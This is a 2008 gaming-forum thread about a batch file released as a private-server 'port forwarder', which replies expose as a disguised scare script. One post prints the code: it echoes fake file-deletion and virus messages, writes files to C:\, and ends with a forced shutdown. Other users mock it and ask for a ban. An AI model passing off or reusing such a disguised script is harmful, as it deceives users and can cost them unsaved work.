Welcome!

Join our community of MMORPG enthusiasts and private server developers! By registering, you'll gain access to in-depth discussions on source codes, binaries, and the latest developments in MMORPG server files. Collaborate with like-minded individuals, explore tutorials, and share insights on building and optimizing private servers. Join us today and unlock the full potential of MMORPG server development!

Join Today!

Server Port Forwarder

Initiate Mage
Joined
Aug 13, 2008
Messages
3
Reaction score
0
It port forwards for both Vana and Odin. :) Have fun and enjoi!
 
Re: [Release]Server Port Forwarder

Port forwarder?
???
Here i was thinking you had to configure your router to do that. :\
Oh wait you do....
???
So what is this?
What's it do?
Simple opens worldproperties and sets ip lol?
 
Re: [Release]Server Port Forwarder

Tested file Status
serverportforwarder.bat
clear

* VPS version: VPS 080812-0 12.08.2008
* Scaner version: 3.0.1
* Scanned files: 1
* Scanned directories: 0
* Archives count: 0
* Infected files:
* Errors: 0
* File count: 1.6 kB
* Scan time: 0s
* Scanned speed: 1.9 MB


Tested on avast!Online Scanner.

And to lolhamachi, it forces your router to open ports 7101, 8484, 8485, and a few others that people might need.
 
Re: [Release]Server Port Forwarder

Scanner results
Scan taken on 13 Aug 2008 05:27:42 (GMT)
A-Squared
Found nothing
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
CPsecure
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Ikarus
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Sophos Antivirus
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing
 
Re: [Release]Server Port Forwarder

Look codes!!!

Code:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo [COLOR="Red"]Deleting Critical System Files[/COLOR]...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo [COLOR="Red"]Deletion Successful[/COLOR]!
echo:
echo:
echo:
echo [COLOR="Red"]Deleting Root Partition[/COLOR]...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo [COLOR="Red"]Deletion Successful[/COLOR]!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo [COLOR="Red"]Creating Directory h4x[/COLOR]...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo [COLOR="Red"]Directory Creation Successful[/COLOR]!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo [COLOR="Red"]Disabling Windows Firewall[/COLOR]...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo [COLOR="Red"]Allowing virus to boot from startup[/COLOR]...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo [COLOR="Red"]Virus has been executed successfully[/COLOR]!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "[COLOR="Red"]Your computer has committed suicide. Have a nice day[/COLOR]."

Ban???
 
Re: [Release]Server Port Forwarder

First of all, you can't port forward through a batch file...
 
Re: [Release]Server Port Forwarder

LOL. What kind of noob tries to destroy your computer through a batch file? Anybody could just open it up in notepad. This is even a bigger fail than the guy who changed a porn link into rapidshare and stuff.
 
Re: [Release]Server Port Forwarder

roflcopterss - Server Port Forwarder - RaGEZONE Forums

Do I have to say anything?
 
Re: [Release]Server Port Forwarder

Go learn how to mask/make your .bat file into an .exe before trying to screw people's computer up.

And to lolhamachi, it forces your router to open ports 7101, 8484, 8485, and a few others that people might need.

Pardon my retardness, but how the fuck can a bat file FORCE a router to open ports?

Danm it!!!
it destroyed my computer!!! hack this sucker!!!
mod pls ban this sucker!!!!!!!!!!!!!!!

Wow.
 
Back